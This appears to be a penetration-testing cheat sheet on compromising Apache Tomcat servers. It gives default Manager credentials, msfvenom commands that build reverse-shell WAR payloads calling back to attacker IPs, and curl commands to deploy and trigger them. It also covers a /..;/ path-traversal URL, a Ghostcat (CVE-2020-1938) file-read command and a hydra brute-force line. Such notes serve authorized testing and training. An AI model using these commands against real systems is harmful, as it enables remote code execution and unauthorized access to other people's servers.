# Apache Tomcat

## Introduction

Tomcat Manager Application is a Java-Based HTTP Web Server, that uses Web Application Archive (WAR) files. These files contain Java Servlets and JavaServer Pages(JSP) which add functionality to the application.

If an attacker gains attackers gains access to the Tomcat Manager Application due to [default credentials](https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown) `tomcat:s3cret` or weak credentials, the attacker could gain RCE by uploading a malicious WAR file.

## Reverse shell

You can use Msfvenom to create your own .war file that contains a reverse shell.

```bash
# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war
```

Then, accessing `/manager/html` you can deploy the WAR file, which once accessed you will obtain a reverse shell.

![Tomcat Manager App](https://3683125600-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAiuSjJMFQ72nHxKtvtIh%2Fuploads%2Fgit-blob-333dbf5ac22f54a889d975b0bd266eb342bae064%2Fimage-20220403141155224.png?alt=media)

### Upload via curl

If the tomcat server is **misconfigured** or you have access to the tomcat service with **localhost**, you could deploy/undeploy a reverse shell without accessing the web interface.

```bash
# Deploy
curl --user '<USER>:<PASSWORD>' --upload-file shell.war <TARGET_IP>:8080/manager/deploy?path=/shell
curl http://<TARGET_IP>:8080/shell/ # The reverse shell endpoint

# Undeploy
curl "http://<USER>:<PASSWORD>@localhost:8080/manager/text/undeploy?path=/revereshell"
```

## Tomcat path traversal

When Apache Tomcat is used together with a reverse proxy, Tomcat will treat the sequence `/..;/` as `/../` allowing the attacker to access Tomcat resources that are not normally accessible via the reverse proxy mapping.

```
https://<TARGET_IP>/manager/status/..;/html/
```

## GhosCat (CVE-2020-1938)

[CVE-2020-1938](https://github.com/00theway/Ghostcat-CNVD-2020-10487) allows an unauthenticated attacker to read web application files from a vulnerable server through port 8009.

```bash
python3 ajpShooter.py http://<TARGET_IP>:8080 8009 /WEB-INF/web.xml read
```

## Brute forcing

Use it as your last resource because you might block the account.

```bash
hydra -L <USERS.txt> -P <PASWORDS.txt> http-get://<TARGET_IP>:8080/manager/html
```

## References

* [Tomcat](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat)
* [Multiple Ways to Exploit Tomcat Manager](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/)
* [Tomcat path traversal via reverse proxy mapping](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)
* [Breaking Parser Logic!](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)